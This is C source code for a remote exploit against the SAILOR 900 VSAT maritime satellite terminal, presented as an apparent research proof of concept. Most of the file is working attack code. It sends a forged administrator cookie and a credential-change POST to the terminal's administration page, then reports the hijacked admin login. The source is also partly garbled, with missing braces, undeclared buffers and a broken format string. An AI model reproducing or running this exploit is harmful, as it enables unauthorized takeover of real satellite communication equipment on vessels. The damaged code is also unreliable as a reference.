** File : satcompwn.c - [VSAT SAILOR SAT COM 900 Remote 0day]
** Author : Nicholas Lemonias
** This is proprietary source code material of Advanced Information Security Corporation.
** Usage, distribution and modifications are pursuant to our terms of agreement.
** Copyright (c) 2009-2014, Advanced Information Security Corporation as represented by the
** author of this software.
** All rights reserved.
** This research demo is for academic research purposes ONLY. You may only use this software for
** educational purposes, or for the purpose of academic research.
** This work is copyright protected. You may not, copy, or distribute
** or use this in any other way, without prior authorisation. This work is covered by DMCA and
** other applicable intellectual property laws.
** #@#@~ VSAT SAILOR 900 / SATCOM (iDirect/Linux)
** Poc Tested on our: iDirect Infiniti VMU/SATCOM v.1.47 Build 9
** Platform Frequency: Ku/Ka band
** Compatible Networks: Jabiru, Inmarsat GX, and Intelsat's Epic
(c) 2014 Advanced Information Security Corporation
** Compilation: cc satcompwn.c -o satcompwn
** HOW-TO:
** Usage: ./satcompwn <host> <port>\n
#include <netinet/in.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <assert.h>
#include <errno.h>
#include <time.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/socket.h>
#define BUFFER_MAX_SIZE 65535
#define BUFFER_MIN_LEN 230
ssize_t payload(int sock, char *hst, char *pg, char *pss)
ssize_t n; char *l;
"POST %s HTTP/1.0\n\n"
"Host: %s\r\n"
"Content-type: application/x-www-form-urlencoded\r\n"
"Content-length: %zu \r\n"
"Cookie: tt_adm=694020\r\n"
"%s \r\n\n", pg, hst, strlen(pss), pss);
if(write(sock,BUF_SIZE_S, strlen(BUF_SIZE_S)) == -1) {
error("Read error");
return -1;
printf("Sending Payload.....\n");
printf("%s", BUF_SIZE_S, sizeof(BUF_SIZE_S));
while ((n =read(sock,BUF_SIZE_R,sizeof(BUF_SIZE_R))) > 0){
BUF_SIZE_R[n] = '\0';
if(n == -1) {
error("Read error");
return -1;
if ( strstr(BUF_SIZE_R, "404")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.5 - False Positive HTTP ERROR [404] Host is not a V-SAT Sailor 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "401")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.2 - HTTP Unauthorized [401] Unauthorized Access to remote host.\n\n\n");
if ( strstr(BUF_SIZE_R, "500")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.5.1 - HTTP Internal Server Error [500] Internal Server Error - The remote host couldn't recognise the request. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "303")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.3.4 - HTTP See Other [303] Possible Redirect - The code received says it is temporary under a different URL. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "307")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.3.8 - HTTP Temporary Redirect [307] Possible Redirect - The requested resource received indicates redirection. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "403")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.4 - HTTP Forbidden [403] The remote server/ understood the request, but is refusing to fulfill it.\n\n\n");
if ( strstr(BUF_SIZE_R, "407")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.8 - HTTP Proxy Authentication Required [407] - The remote terminal requires HTTP authentication. If this is a valid SAILOR 900 terminal, it is protected with HTTP authentication.\n\n\n");
if ( strstr(BUF_SIZE_R, "408")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.9 - HTTP Request Time out [408] - The client did not produce a request within the time that the server was prepared to wait.\n\n\n");
if ( strstr(BUF_SIZE_R, "503")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.5.4 - HTTP Service Unavailable [503] - Connection Refused. The hostname of the terminal provided is currently unable to handle the request.\n\n\n");
if ( strstr(BUF_SIZE_R, "411")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 411 - Length Required. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "400")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 400 - Bad Request. This is not a valid SAILOR 900 terminal. The request could not be understood by the remote server.\n\n\n");
if ( strstr(BUF_SIZE_R, "301")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 301 - Moved Permanently. This is not a valid SAILOR 900 terminal. The request could not be understood by the remote server.\n\n\n");
if ( strstr(BUF_SIZE_R, "BAD REQUEST")) printf("\n\n[x] Exploit Failed. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "202")) {
while ( (l=strstr(BUF_SIZE_R,"Thrane & Thrane")) == NULL ) printf("\n\n[x] Exploit Failed. This is not a valid SAILOR 900 terminal...\n\n\n"); }
else if (strstr(BUF_SIZE_R, "Thrane & Thrane") != NULL && strstr(BUF_SIZE_R, "302") == NULL){
printf("[x] Mission Successful Ref. RFC 2616, 10.2.3 - HTTP Okay [202] The remote host is a V-SAT Sailor 900. Please Login as administrator: user:admin & pass:aisatpwn2134 on %s\n\n\n", hst);
printf("*Advanced Information Security Corporation, 2014 - All Rights Reserved*\n");
printf("* Please wait.. I will provide you with some more information below:\n");
printf("%s \n\n", BUF_SIZE_R, sizeof(BUF_SIZE_R));
return n;
int main (int argc, char *argv[]) {
char *pg = "/index.lua?pageID=administration";
char *pss = "&usernameAdmChange=admin"
// char *cval = "tt_adm=tt_adm=694020";
long arg;
int sock, opt, evalopt, s;
if(argc < 2)
printf("(Advanced Information Security Corporation, 2014 - All Rights Reserved*\n");
printf("* *\n");
printf("* (V-SAT SAILOR 900 Remote Exploit) *\n");
printf("* Disclaimer: This is proprietary source code material of Advanced *\n");
printf("* Information Security Corporation. This software is for *\n");
printf("* research purposes only. *\n");
printf("* VSAT Sailor 900 / Tested on iDirect Infiniti VMU v.1.47 Build 9 *\n");
printf("* Description: *\n");
printf("* The Sailor 900 VSAT is an advanced maritime stabilised Ku/Ka band *\n");
printf("* platform with integrated GPS, compatible with a number of satellite *\n");
printf("* networks, such as Jabiru, Inmarsat GX, and Intelsat's Epic. *\n");
fprintf(stderr, " Main Menu \n");
fprintf(stderr, " Usage: %s <host> <port>\n", argv[0]);
struct timeval tv;
struct sockaddr_in remote;
struct hostent *host;
socklen_t lon;
host = gethostbyname((void *)argv[1]);
fd_set wset;
fd_set rset;
sock = socket(AF_INET,SOCK_STREAM,0);
remote.sin_port = htons(atoi(argv[2]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
remote.sin_addr.s_addr = ((struct in_addr *)(host->h_addr))->s_addr;
remote.sin_family = AF_INET;
if (sock == -1) {
perror("socket creation error");
return -1;
FD_ZERO( &wset );
FD_SET( sock , &wset );
FD_ZERO( &rset );
FD_SET( sock , &rset );
tv.tv_sec = 3;
tv.tv_usec = 0;
s = connect(sock,(struct sockaddr *)&remote,sizeof(struct sockaddr));
if (s == -1 ) {
perror("connection ");
return -1;}
if( errno != 0) {
perror("connection ");
return -1;
arg = fcntl(sock, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(sock, F_SETFL, arg);
if( fcntl( sock , F_SETFL , O_NONBLOCK ) == -1 ) {
perror("fcntl error");
return -1;
opt = select(sock+1,NULL,&wset,NULL,&tv);
if( opt == -1 ) {
return -1;
if (opt > 0) {
lon = sizeof(int);
getsockopt(sock, SOL_SOCKET, SO_ERROR, (void*)(&evalopt), &lon);
if (evalopt) {
fprintf(stderr, "Socket Connection Error Code at: %d - %s\n", evalopt, strerror(evalopt));
if( fcntl( sock , F_SETFL , 0 ) == -1 ) {
printf("[RST-FCNTL] FCNTL Error. Exiting the software.\n\n");
return -1;
if( payload(sock,host->h_name,pg,pss) != 1) printf("\n\n[x] Payload Sent. Please check server responses above to verify status.\n\n");
arg = fcntl(sock, F_GETFL, NULL);
arg &= (~O_NONBLOCK);
fcntl(sock, F_SETFL, arg);